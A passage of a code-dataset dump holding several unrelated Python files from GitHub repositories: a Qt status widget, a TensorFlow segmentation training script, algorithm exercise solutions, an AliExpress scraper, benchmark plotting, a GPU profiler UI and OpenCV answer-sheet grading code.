'MissionStatus'])\n\n def create_statusbar_widget(self):\n \"\"\"Create label for status bar showing number of requests processed\n\n :return: label widget\n :rtype: QLabel\n \"\"\"\n queue_status_label = QLabel()\n queue_model = self.table.model().sourceModel()\n\n def update_text():\n \"\"\"Update \"Processing ... requests\" label text on status bar\"\"\"\n count = queue_model.rowCount()\n queue_status_label.setText(\"Processing {} requests\"\n .format(count))\n\n update_text()\n queue_model.rowsInserted.connect(update_text)\n queue_model.rowsRemoved.connect(update_text)\n return queue_status_label\n\n def on_paused(self, paused):\n self.setWindowTitle('&Queue' + (' [paused]' if paused else ''))\n","repo_name":"KrakSat-2016/kraksat-receiver","sub_path":"app/mainwindow/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"26411384912","text":"\"\"\" Iname duplication strategies to make kernels schedulable \"\"\"\nfrom loopy import (has_schedulable_iname_nesting,\n get_iname_duplication_options,\n duplicate_inames,\n )\n\n\ndef heuristic_duplication(kernel):\n # If the given kernel is schedulable, nothing needs to be done.\n if has_schedulable_iname_nesting(kernel):\n return kernel\n\n # List all duplication options and return the transformed\n # kernel if one such duplication transformation was enough to solve the problem.\n for iname, within in get_iname_duplication_options(kernel):\n dup_kernel = duplicate_inames(kernel, iname, within)\n if has_schedulable_iname_nesting(dup_kernel):\n return dup_kernel\n\n raise NotImplementedError(\"Your kernel needs multiple iname duplications! No generic algorithm implemented for that yet! 
(#39)\")\n","repo_name":"jiaqiwang969/dune-course-material","sub_path":"iwr-course-2021/dune/dune-codegen/python/dune/codegen/loopy/transformations/duplicate.py","file_name":"duplicate.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23281330636","text":"from models import UNet, FCN, FCN_ResNet50, FCN_VGG19\r\nfrom utils import entropy_loss, dice_loss\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport math\r\nimport time\r\nimport sys\r\n\r\n# python demo_U-net.py fcn/unet cross_entropy/dice_loss\r\nmodel_name = sys.argv[1]\r\nprint('Get model name: ', model_name)\r\nprint('Get loss function: ', sys.argv[2])\r\nif len(sys.argv)>2 and sys.argv[2]=='cross_entropy':\r\n loss_function = entropy_loss\r\nelif len(sys.argv)>2 and sys.argv[2]=='dice_loss':\r\n loss_function = dice_loss\r\nelse:\r\n loss_function = entropy_loss\r\n\r\nx_train_path = './Dataset/sample_train_color/'\r\nt_train_path = './Dataset/sample_train_label/'\r\nx_train_name = os.listdir(x_train_path)\r\nt_train_name = os.listdir(t_train_path)\r\nx_train_name = [x_train_path+s for s in x_train_name]\r\n#x_train_name = x_train_name[0:100]\r\nx_train_name.sort()\r\nt_train_name = [t_train_path+s for s in t_train_name]\r\n#t_train_name = t_train_name[0:100]\r\nt_train_name.sort()\r\n\r\n# parameters\r\nbatch_size = 32\r\nepoch = 10 \r\nLR = 5e-4\r\nimg_height = 90\r\nimg_width = 420\r\ndown_scale = 8\r\nclass_num = 2\r\ndata_size = len(x_train_name)\r\nn_batches = int(math.ceil(data_size/batch_size))\r\n\r\n\r\n# This cell is used to construct the pipeline of dataset\r\ndef _parse_function(x_name, t_name, img_shape, down_scale, class_num):\r\n x_string = tf.read_file(x_name)\r\n x = tf.image.decode_jpeg(x_string, channels=3)\r\n x = x[1560:2280, 7:-7]/1000\r\n x = tf.image.resize_images(x, img_shape)\r\n t_string = tf.read_file(t_name)\r\n t = tf.image.decode_png(t_string, channels=1, dtype=tf.uint16)\r\n t = t[1560:2280, 7:-7]\r\n t = t[::down_scale, ::down_scale]\r\n t = t[:, 1:-1]\r\n t = tf.cast(t/1000, tf.int32)\r\n \r\n shape = tf.shape(t)\r\n t = tf.reshape(t, (shape[0]*shape[1],))\r\n t = tf.one_hot(t, depth=41)\r\n t = tf.concat([t[:, 0:1], t[:, 33:34]], axis=1)\r\n t = tf.reshape(t, (shape[0], shape[1], class_num))\r\n \r\n return x, t\r\n\r\nx_filenames = tf.constant(x_train_name)\r\nt_filenames = tf.constant(t_train_name)\r\n\r\ndataset = tf.data.Dataset.from_tensor_slices((x_filenames, t_filenames))\r\ndataset = dataset.map(lambda x, y: _parse_function(x, y, (img_height, img_width), down_scale, class_num))\r\ndataset = dataset.shuffle(buffer_size=32).batch(batch_size).repeat(epoch+1)\r\niterator = dataset.make_initializable_iterator()\r\nnext_batch = iterator.get_next()\r\n\r\nx_batch, t_batch = next_batch # get the tf variable of input and target images\r\n\r\n\r\nif model_name.lower()=='unet' or model_name.lower=='u-net':\r\n segnet = UNet(x=x_batch, t=t_batch,\r\n LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\nelif model_name.lower()=='fcn':\r\n segnet = FCN(x=x_batch, t=t_batch,\r\n LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\nelif model_name.lower()=='resnet50' or model_name.lower()=='resnet':\r\n segnet = FCN_ResNet50(x=x_batch, t=t_batch,\r\n 
LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\nelif model_name.lower()=='vgg19' or model_name.lower()=='vgg':\r\n segnet = FCN_VGG19(x=x_batch, t=t_batch,\r\n LR=LR, input_shape=[None, img_height, img_width, 3], \r\n output_shape=[None, img_height, img_width, class_num], )\r\n segnet.optimize(loss_function)\r\n\r\nsess = tf.Session()\r\nsess.run(tf.global_variables_initializer())\r\nsess.run(iterator.initializer)\r\n\r\n\r\nsaver = tf.train.Saver(max_to_keep=epoch)\r\nif not os.path.isdir('./Models'):\r\n os.mkdir('./Models')\r\n os.mkdir('./Models/'+model_name+'/')\r\nelif not os.path.isdir('./Models/'+model_name+'/'):\r\n os.mkdir('./Models/'+model_name+'/')\r\n\r\ntotal_loss = 0\r\nstart = time.time()\r\nfor _ in range(n_batches):\r\n loss = sess.run(segnet.loss)\r\n total_loss += loss\r\n end = time.time()\r\nmessage = 'Epoch: {:>2} | Loss: {:>10.8f} | Time: {:>6.1f}'\r\nprint(message.format(0, total_loss/n_batches, end-start))\r\n \r\nif os.path.isfile('./log'):\r\n os.remove('./log')\r\nwith open('./log', 'a') as file_write:\r\n file_write.write(model_name + ' ' + sys.argv[2] )\r\n file_write.write(message.format(0, total_loss/n_batches, end-start))\r\n file_write.write('\\n')\r\n\r\nfor ep in range(epoch):\r\n total_loss = 0\r\n start = time.time()\r\n for _ in range(n_batches):\r\n _, loss = sess.run([segnet.training, segnet.loss])\r\n total_loss += loss\r\n end = time.time()\r\n message = 'Epoch: {:>2} | Loss: {:>10.8f} | Time: {:>6.1f}'\r\n print(message.format(ep+1, total_loss/n_batches, end-start))\r\n \r\n if not os.path.isdir('./Models/'+model_name):\r\n os.mkdir('./Models/'+model_name)\r\n os.mkdir('./Models/'+model_name+'/'+model_name+'-'+str(ep))\r\n elif not os.path.isdir('./Models/'+model_name+'/'+model_name+'-'+str(ep)):\r\n os.mkdir('./Models/'+model_name+'/'+model_name+'-'+str(ep))\r\n save_path = saver.save(sess, \r\n './Models/'+model_name+'/'+model_name+'-'+str(ep)+'/'+model_name+'.ckpt')\r\n \r\n with open('./log', 'a') as file_write:\r\n file_write.write(message.format(ep+1, total_loss/n_batches, end-start))\r\n file_write.write('\\n')\r\n","repo_name":"rayush7/CVPR-2018-WAD-Video-Segmentation-Challenge","sub_path":"demo_U-net.py","file_name":"demo_U-net.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5326589254","text":"class Solution:\n def dp(self,A,i,j,dp):\n global ans\n if dp[i][j]:\n return dp[i][j]\n\n if i == 0 or j == 0:\n ans = 1\n else:\n ans = self.dp(A,i-1,j,dp) + self.dp(A,i,j-1,dp)\n dp[i][j] = ans\n return ans\n\n def Solve(self,m,n):\n dp = [[0]*n for _ in range(m)]\n self.dp(A,m-1,n-1,dp)\n return dp[-1][-1]\n\nif __name__ == '__main__':\n A = 3\n B = 2\n C = Solution()\n print(C.Solve(A,B))\n","repo_name":"srajsonu/LeetCode-Solutions-Python","sub_path":"Dynamic Programming/62. Unique Paths.py","file_name":"62. 
Unique Paths.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71230403766","text":"# 백준 #1796 신기한 키보드\n'''\n Algorithm: dp\n Time Complexity: -\n\n 알파벳 순서로 클릭.\n ex) 'e'의 최소 위치와 최대 위치 사이를 움직이면 모든 'e'를 클릭할 수 있다.\n\n dp[i][j] : 현재 커서가 i일때, j번째 알파벳을 모두 클릭하기 위해 필요한 최소 이동 횟수 \n'''\nimport sys\nfrom typing import List, Tuple, Callable\n\nINF = sys.maxsize\n\ndef input() -> Callable:\n return sys.stdin.readline().rstrip()\n\n\ndef read_data() -> Tuple:\n S = list(input())\n return S,\n\ndef ctoi(c:str) -> int:\n return ord(c) - ord('a')\n\ndef solution(S:List[str]) -> int:\n N = len(S)\n alp_info = [None for _ in range(26)] # [최소 위치, 최대 위치]\n dp = [[INF for _ in range(26)] for _ in range(N)]\n \n def click(cur:int, dest:int, l:int, r:int) -> int:\n '''\n 이동 비용을 계산: cur -> l -> r -> dest\n '''\n return abs(cur - l) + abs(l - r) + abs(r - dest)\n\n def keyboard(cur:int, alp:int):\n '''\n cur : 현재 위치\n alp : 클릭할 문자 인덱스\n '''\n if alp == 26:\n return 0\n \n if dp[cur][alp] == INF:\n if alp_info[alp]:\n mind, maxd = alp_info[alp]\n\n # 모든 위치를 검사하여 최적의 경로를 찾는다. \n for i in range(N):\n dp[cur][alp] = min(dp[cur][alp], min(click(cur, i, mind, maxd), click(cur, i, maxd, mind)) + keyboard(i, alp+1))\n \n else:\n dp[cur][alp] = keyboard(cur, alp+1)\n\n return dp[cur][alp]\n\n # main\n for i in range(len(S)):\n idx = ctoi(S[i])\n if alp_info[idx]:\n alp_info[idx][1] = i\n else:\n alp_info[idx] = [i, i]\n\n return keyboard(0, 0) + N # N번의 클릭\n\n\nif __name__ == \"__main__\":\n print(solution(*read_data()))\n","repo_name":"HeoSeokYong/AlgorithmStudy","sub_path":"Dynamic_Programming/strange_keyboard.py","file_name":"strange_keyboard.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43957542130","text":"import sys\n\ndef up_and_down():\n import random\n random_num = random.randint(1, 30)\n #정수만 만들거니께 randint\n\n while True:\n user_input = int(sys.stdin.readline())\n if user_input < 1 or user_input > 30:\n raise ValueError(\"원하는 숫자의 범위를 초과\")\n #예외 상황에 대응\n #제대로 입력을 끝까지 받아내겠다는 의지..\n if user_input == random_num:\n print('정답입니다!!!')\n break\n elif user_input > random_num:\n print(\"Down\")\n else:\n print(\"UP\")\n\ntry:\n #예외가 발생하지 않으면 try 블록의 코드 정상적 실행, 예외 발생하면 비정상적으로 종료되는 대신 예외 처리 부분이 처리 됨.\n #일부러 ValueError를 발생시키는데 try문 없으면 이 예외를 처리하지 않고 프로그램이 종료되는 문제가 생김..\n #while문과 함께 사용하여 예외 처리 후에도 while루프가 계속해서 동작할 수 있도록 구성\n #반복적으로 사용자에게 입력을 받아 처리하거나 특정 조건이 충족될 때까지 반복하는 상황에서 유리\n up_and_down()\nexcept Exception as e:\n print(e)","repo_name":"Suhyugyeong/python","sub_path":"python_231120/19_except_raise.py","file_name":"19_except_raise.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11321738523","text":"import requests\nfrom requests_html import HTMLSession\nfrom bs4 import BeautifulSoup\nimport csv\nfrom itertools import zip_longest\nimport pandas as pd\n\ndf=pd.DataFrame(columns=[\n \"Title\",\n \"Price\",\n \"Qty_sold\",\n \"Ranting\",\n \"Shipping\",\n \"Store\"\n])\n\nsession=HTMLSession()\nheaders={\n\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 
Safari/537.36\"\n}\n\n\nurl=\"https://fr.aliexpress.com/?gatewayAdapt=glo2fra\"\n\nresult=session.get(\"https://fr.aliexpress.com/?gatewayAdapt=glo2fra\")\n\nresult.html.render(sleep=2,timeout=20)\ncategories= result.html.find(\"#home-firstscreen > div > div > div.categories-main > div > div > div.categories-list-box > dl.cl-item\")\n\n# print(categories.text)\n# print(list(categories.absolute_links)[0])\n\ncategorie_list=[]\nfor cats in categories:\n categorie_link=list(cats.absolute_links)[0]\n categorie_name=cats.text\n categorie_dict={\n \"name\":categorie_name,\n \"link\":categorie_link\n }\n categorie_list.append(categorie_dict)\n\n#print(categorie_list)\nresult=session.get(categorie_list[0][\"link\"])\nresult.html.render(sleep=4,timeout=20,scrolldown=14)\nproducts=result.html.find(\"#root > div.glosearch-wrap > div > div.main-content > div.right-menu > div > div.JIIxO > a._3t7zg\")\n\n#print(len(products))\nfor product in products:\n try:\n product_title=product.find(\"._18_85\",first=True).text\n product_price= product.find(\".mGXnE\", first=True).text\n quantity_sold=product.find(\"._1kNf9\",first=True).text\n ranting=product.find(\".eXPaM\",first=True).text\n shipping=product.find(\"._2jcMA\",first=True).text\n store=product.find(\".ox0KZ\",first=True).text\n dfnew = pd.DataFrame({\n \"Title\": [product_title],\n \"Price\": [product_price],\n \"Qty_sold\": [quantity_sold],\n \"Ranting\": [ranting],\n \"Shipping\": [shipping],\n \"Store\": [store]\n })\n df=pd.concat([df,dfnew])\n except AttributeError:\n pass\n\n\n\ndf.to_csv(\"aliexpress.csv\")\nprint(df)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#\n#\n# src=result.content\n# #print(src)\n#\n#\n# soup=BeautifulSoup(src,'lxml')\n# #print(soup)\n#\n#\n# link_tag=soup.find_all(\"div\",{\"id\":\"root\"})\n# print(link_tag)\n# # links_url=[]\n# # for i in link_tag:\n# # links_url.append(i.get('href'))\n# # #print(i.get('href'))\n# #\n# # #for i in range(len(links_url)):\n# # result_links=requests.get(links_url[0])\n# # src_links=result_links.content\n# # soup_links=BeautifulSoup(src_links,'lxml')\n# # titles=soup.find_all(\"a\")\n# #\n# # print(links_url)\n# #\n# # print(titles)","repo_name":"zack-dark/ExpressBot","sub_path":"scrapBot.py","file_name":"scrapBot.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"40570786469","text":"import glob\nimport sys\nimport matplotlib.pyplot as plt\nfrom matplotlib.cm import ScalarMappable\n\nimport numpy as np\n\nfrom tools.paper.plotting.plot_utils import plot_save\nfrom tools.paperv2.dlmc.utils import *\n\nfrom matplotlib import rc, rcParams\nfrom tools.paper.plotting.plot_utils import *\nfrom scipy import stats\n\nplt.rcParams[\"font.family\"] = \"Times New Roman\"\nplt.rcParams.update({'font.size': 15})\nplt.rcParams[\"figure.figsize\"] = (6, 4)\nplt.rcParams['axes.xmargin'] = 0\nplt.rcParams['axes.ymargin'] = 0\n\nfig, axs = plt.subplots(1, 4, figsize=(16,3))\n\nidfs = []\nfor bcol in [32, 128, 256, 512]:\n idfs.append(read_cache(\"cascade\", \"all\", bcols=bcol, threads=20))\nidf = pd.concat(idfs)\n\nadfs = []\nfor bcol in [32, 128, 256, 512]:\n adfs.append(read_cache(\"raspberrypi\", \"all\", bcols=bcol, threads=4))\nadf = pd.concat(adfs)\n\nidf[\"Speed-up vs Dense\"] = idf[f\"time median|MKL_Dense\"] / idf[f\"time median|Sp. Reg.\"]\nidf[\"Speed-up vs Sparse\"] = idf[f\"time median|MKL_Sparse\"] / idf[f\"time median|Sp. 
Reg.\"]\nidf = idf[idf[\"Speed-up vs Dense\"] > 0.0]\nidf = idf[idf[\"Speed-up vs Dense\"] < 10]\nidf = idf[idf[\"Speed-up vs Sparse\"] > 0.0]\nidf = idf[idf[\"Speed-up vs Sparse\"] < 10]\n\nadf[\"Speed-up vs Dense\"] = adf[f\"time median|ARMCL\"] / adf[f\"time median|Sp. Reg.\"]\nadf[\"Speed-up vs Sparse\"] = adf[f\"time median|XNN\"] / adf[f\"time median|Sp. Reg.\"]\nadf = adf[adf[\"Speed-up vs Dense\"] > 0.0]\nadf = adf[adf[\"Speed-up vs Dense\"] < 10]\nidf = idf[idf[\"Speed-up vs Sparse\"] > 0.0]\nidf = idf[idf[\"Speed-up vs Sparse\"] < 10]\n\nadf = adf.sort_values(by=['sparsity'], ascending=True)\nidf = idf.sort_values(by=['sparsity'], ascending=True)\n\nidf = idf[(idf['sparsity'] >= 0.6) & (idf['sparsity'] <= 0.95)]\nadf = adf[(adf['sparsity'] >= 0.6) & (adf['sparsity'] <= 0.95)]\n\nadf['flops'] = adf['gflops'] * 1e9\nidf['flops'] = idf['gflops'] * 1e9\n\nax = axs[0]\nidf.plot(kind='scatter', x='flops', y='Speed-up vs Sparse', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel('Speedup', fontsize=14)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus MKL SpMM (CSR)', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\nax = axs[1]\nidf.plot(kind='scatter', x='flops', y='Speed-up vs Dense', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel(None)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus MKL SGEMM', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\nax = axs[2]\nadf.plot(kind='scatter', x='flops', y='Speed-up vs Sparse', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel(None)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus XNNPACK', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\nax = axs[3]\ns = adf.plot(kind='scatter', x='flops', y='Speed-up vs Dense', c='sparsity', colormap='cividis', alpha=0.5, s=1, ax=ax, colorbar=False)\nax.set_xscale('log')\nax.set_ylim(0, 8)\nax.set_ylabel(None)\nax.axhline(y=1.0, color='r', linestyle='-')\nax.spines.right.set_visible(False)\nax.spines.top.set_visible(False)\nax.set_title(f'Versus ARMCL SGEMM', fontsize=16, pad=15)\nax.set_xlabel('Problem Size (FLOPs)', fontsize=14)\n\n\ncmap = plt.get_cmap(\"cividis\")\nnorm = plt.Normalize(60, 95)\nsm = ScalarMappable(norm=norm, cmap=cmap)\nsm.set_array([])\ncbar = fig.colorbar(sm, ax=axs, pad=0.02)\ncbar.set_label(\"Sparsity\", labelpad=6, y=0.45)\nsavefig(f'figure7.pdf')","repo_name":"SpRegTiling/sparse-register-tiling","sub_path":"tools/paperv2/dlmc/plot_figure7.py","file_name":"plot_figure7.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"28335192353","text":"import coalpy.gpu as g\nimport numpy as nm\nimport math as m\n\nclass Profiler:\n def __init__(self):\n self.m_active = True\n self.m_gpu_queue = []\n self.m_marker_data = []\n self.m_plot_capacity = 200\n self.m_curr_tick = 0\n self.m_gpu_plot_data = nm.zeros((self.m_plot_capacity, 2), dtype='f')\n\n @property\n def active(self):\n return self.m_active\n\n 
@active.setter\n def active(self, value):\n self.m_active = value\n\n def build_ui(self, imgui : g.ImguiBuilder, implot : g.ImplotBuilder):\n self.m_active = imgui.begin(\"Profiler\", self.m_active)\n if self.m_active and imgui.begin_tab_bar(\"profiler-tab\"):\n if imgui.begin_tab_item(\"Timeline\"):\n self._build_timeline_ui(imgui, implot)\n imgui.end_tab_item()\n if imgui.begin_tab_item(\"Hierarchy\"):\n self._build_hierarchy_ui(imgui)\n imgui.end_tab_item()\n if imgui.begin_tab_item(\"Raw Counters\"):\n self._build_raw_counter_ui(imgui)\n imgui.end_tab_item()\n imgui.end_tab_bar()\n imgui.end()\n\n def _build_raw_counter_ui(self, imgui : g.ImguiBuilder):\n titles = [\"ID\", \"ParentID\", \"Name\", \"Time\", \"BeginTimestamp\", \"EndTimestamp\"]\n imgui.text(f\"{titles[0] : <4} {titles[1] : <8} {titles[2] : <32} {titles[3] : ^10} {titles[4] : ^18} {titles[5] : ^18} \")\n for id in range(0, len(self.m_marker_data)):\n (name, end_timestamp, begin_timestamp, parent_id) = self.m_marker_data[id]\n time = end_timestamp - begin_timestamp\n time_str = \"%.4f ms\" % (time * 1000)\n imgui.text(f\"{id: <4} {parent_id : <8} {name : <32} {time_str : ^10} {begin_timestamp : ^18} {end_timestamp : ^18} \")\n\n def _build_hierarchy_ui(self, imgui : g.ImguiBuilder):\n if len(self.m_marker_data) == 0:\n return\n\n hierarchy = [(id, []) for id in range(0, len(self.m_marker_data))]\n node_stack = []\n for id in range(0, len(self.m_marker_data)):\n (_, _, _, parent_id) = self.m_marker_data[id]\n if parent_id != -1:\n hierarchy[parent_id][1].append(id)\n else:\n node_stack.append((id, False))\n\n node_stack.reverse()\n for (_, l) in hierarchy:\n l.reverse()\n\n while len(node_stack) > 0:\n (id, was_visited) = node_stack.pop()\n if was_visited:\n imgui.tree_pop()\n else:\n (name, timestamp_end, timestamp_begin, _) = self.m_marker_data[id]\n children = hierarchy[id][1]\n flags = (g.ImGuiTreeNodeFlags.Leaf|g.ImGuiTreeNodeFlags.Bullet) if len(children) == 0 else 0\n timestamp_str = \"%.4f ms\" % ((timestamp_end - timestamp_begin) * 1000)\n if imgui.tree_node_with_id(id, f\"{name : <32}{timestamp_str}\", flags):\n node_stack.append((id, True)) #set was_visited to True\n node_stack.extend([(child_id, False) for child_id in children])\n\n def _build_timeline_ui(self, imgui : g.ImguiBuilder, implot : g.ImplotBuilder):\n if implot.begin_plot(\"Timeline\"):\n implot.setup_axes(\"Tick\", \"Time (ms)\", 0, g.ImPlotAxisFlags.AutoFit)\n implot.setup_axis_limits(g.ImAxis.X1, self.m_curr_tick - self.m_plot_capacity, self.m_curr_tick, g.ImPlotCond.Always)\n implot.plot_shaded(\"gpu time\", self.m_gpu_plot_data, self.m_plot_capacity, -float('inf'),(self.m_curr_tick % self.m_plot_capacity))\n implot.end_plot()\n\n def begin_capture(self):\n if not self.active:\n return\n\n g.begin_collect_markers()\n\n def end_capture(self): \n if not self.active:\n return\n\n marker_gpu_data = g.end_collect_markers()\n request = g.ResourceDownloadRequest(marker_gpu_data.timestamp_buffer)\n self.m_gpu_queue.append((marker_gpu_data, request))\n\n if self.m_gpu_queue[0][1].is_ready():\n #extract markers\n (data, req) = self.m_gpu_queue.pop(0)\n gpu_timestamps = nm.frombuffer(req.data_as_bytearray(), dtype=nm.uint64)\n self.m_marker_data = [ (name, gpu_timestamps[ei]/data.timestamp_frequency, gpu_timestamps[bi]/data.timestamp_frequency, pid) for (name, pid, bi, ei) in data.markers]\n\n #process history\n root_tstamps = [(b, e) for (_, e, b, pid) in self.m_marker_data if pid == -1]\n if len(root_tstamps) > 0:\n begin_timestamp = min([t for (t, _) in 
root_tstamps])\n                end_timestamp = max([t for (_, t) in root_tstamps])\n                plot_idx = (self.m_curr_tick % self.m_plot_capacity)\n                self.m_gpu_plot_data[plot_idx][0] = self.m_curr_tick\n                self.m_gpu_plot_data[plot_idx][1] = (end_timestamp - begin_timestamp) * 1000\n                self.m_curr_tick = self.m_curr_tick + 1\n        \n","repo_name":"kecho/grr","sub_path":"grr/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":4970,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"76"}
{"seq_id":"5818289039","text":"from imutils import contours , grab_contours , perspective \nfrom imutils.perspective import four_point_transform\nimport numpy as np\nfrom pyzbar import pyzbar\n\nimport pandas as pd\n\ndef shadow_remover(cv2 ,img):\n    grayscale_plane = cv2.split(img)[0]\n    dilated_img = cv2.dilate(grayscale_plane, np.ones((7, 7), np.uint8))\n    bg_img = cv2.medianBlur(dilated_img, 21)\n    diff_img = 255 - cv2.absdiff(grayscale_plane, bg_img)\n    normalized_img = cv2.normalize(diff_img, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8UC1)\n    return normalized_img\n\ndef load_answers(quizzpath): \n    df = pd.read_excel(quizzpath + \"/quizz.xlsx\") \n    ANSWERS={x:df[\"correct\"][x] for x in range(0,10)} \n    return ANSWERS\n\ndef get_ordered_answers(code,right_answers,nb_questions):\n    order = code.split(' ')\n    order = [int(x)-1 for x in order]\n    ordered_answers = {}\n    for x in range(0,nb_questions):\n        ordered_answers[x] = right_answers[order[x]]\n    return ordered_answers\n\ndef read_qrcode(cv2, image):\n    barcodes = pyzbar.decode(image) \n    code = None\n    if len(barcodes) >=0:\n        for barcode in barcodes: \n            (x, y, w, h) = barcode.rect\n            code = barcode.data.decode(\"utf-8\") \n            cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 2)\n            cv2.putText(image, code, (x-200, y + 95), cv2.FONT_HERSHEY_SIMPLEX,0.5, (0, 0, 255), 2)\n    return image , code\n\ndef preprocess(cv2 , image , gray , ANSWER_KEY , nb_questions , nb_prop=4):\n    questionCnts = [] \n    \n    font = cv2.FONT_HERSHEY_SIMPLEX \n    \n    thresh = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C,cv2.THRESH_BINARY_INV,67,10)\n    kernel = np.ones((1,1),np.uint8)\n    thresh = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)\n    thresh = cv2.dilate(thresh,kernel,iterations = 5)\n    #beta test\n    \n    #beta test end\n    cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n    cnts = grab_contours(cnts)\n    \n    \n    for c in cnts:\n        (x, y, w, h) = cv2.boundingRect(c)\n        ar = w / float(h)\n        #define size of detected bubbles here\n        if w >= 3 and h >= 3 and ar >= 0.9 and ar <= 1.1:\n            questionCnts.append(c) \n    correct = 0\n    if len(questionCnts) == nb_questions * nb_prop :\n        questionCnts = contours.sort_contours(questionCnts,method=\"top-to-bottom\")[0] \n        #cv2.imshow('thresh' , thresh)\n        print(len(questionCnts))\n        try:\n            \n            for (q, i) in enumerate(np.arange(0, len(questionCnts), nb_prop)):\n                cnts = contours.sort_contours(questionCnts[i:i + nb_prop ])[0]\n                bubbled = []\n                \n                for (j, c) in enumerate(cnts): \n                    mask = np.zeros(thresh.shape, dtype=\"uint8\")\n                    cv2.drawContours(mask, [c], -1, 255, -1)\n                    mask = cv2.bitwise_and(thresh, thresh, mask=mask)\n                    total = cv2.countNonZero(mask) \n                    #print(total) \n                    if total > 600: \n                        bubbled.append((total , j))\n                color = (0, 0, 255)\n                #print(bubbled) \n                k = ANSWER_KEY[q]-1\n                if (bubbled !=None):\n                    #if only one bubble is chosen\n                    if len(bubbled) == 1: \n                        if k == bubbled[0][1]:\n                            color = (0, 255, 0)\n                            correct += 1\n                        cv2.drawContours(image, [cnts[k]], -1, color, 3) \n                    
else:\n                        for y in range(len(cnts)):\n                            cv2.drawContours(image, [cnts[y]], -1, color, 3) \n            #cv2.imshow(\"marked\" , image)\n        \n        except Exception as E :\n            print(E)\n\n    return correct , image\n\n\ndef detect_roi(cv2 , org , f , corners , ids):\n    result = []\n    roi = None\n    for i in range(0, len(ids)):\n        try:\n            marker = np.squeeze(corners[i]) \n            x1,y1 = marker[0]\n            x2,y2 = marker[2]\n            x = int((x1 + x2)/2)\n            y = int((y1 + y2)/2) \n            result.append((x, y))\n        except Exception as E:\n            #print(E)\n            pass \n    \n    try: \n        edges = np.array(result) \n        roi = perspective.four_point_transform(f,edges) \n        for point in result:\n            x , y = point\n            cv2.circle(f , (x,y) , 10 , (0,255,0),-1)\n        \n        ct = np.array(result).reshape((-1,1,2)).astype(np.int32)\n        rect = cv2.minAreaRect(ct)\n        box = cv2.boxPoints(rect)\n        box = np.int0(box)\n        cv2.drawContours(f , [box] , 0 , (255,0,0) , 2 )\n        \n    except Exception as E:\n        print(E)\n        pass\n    return f , roi\n\ndef detect_roi2(cv2 , org , edged , gray) :\n    f = org.copy()\n    cnts = cv2.findContours(edged, cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n    cnts = grab_contours(cnts)\n    docCnt = None\n    \n    for c in cnts:\n        # approximate the contour\n        peri = cv2.arcLength(c, True)\n        approx = cv2.approxPolyDP(c, 0.02 * peri, True)\n\n        # if our approximated contour has four points,\n        # then we can assume we have found the paper\n        if len(approx) == 4 and cv2.contourArea(c) >= 450 :\n            docCnt = approx\n            break\n\n    if docCnt is not None:\n        x , y , w , h = cv2.boundingRect(docCnt) \n        cv2.rectangle(f,(x,y),(x+w,y+h),(0,255,0),2)\n        warped = four_point_transform(f, docCnt.reshape(4, 2))\n        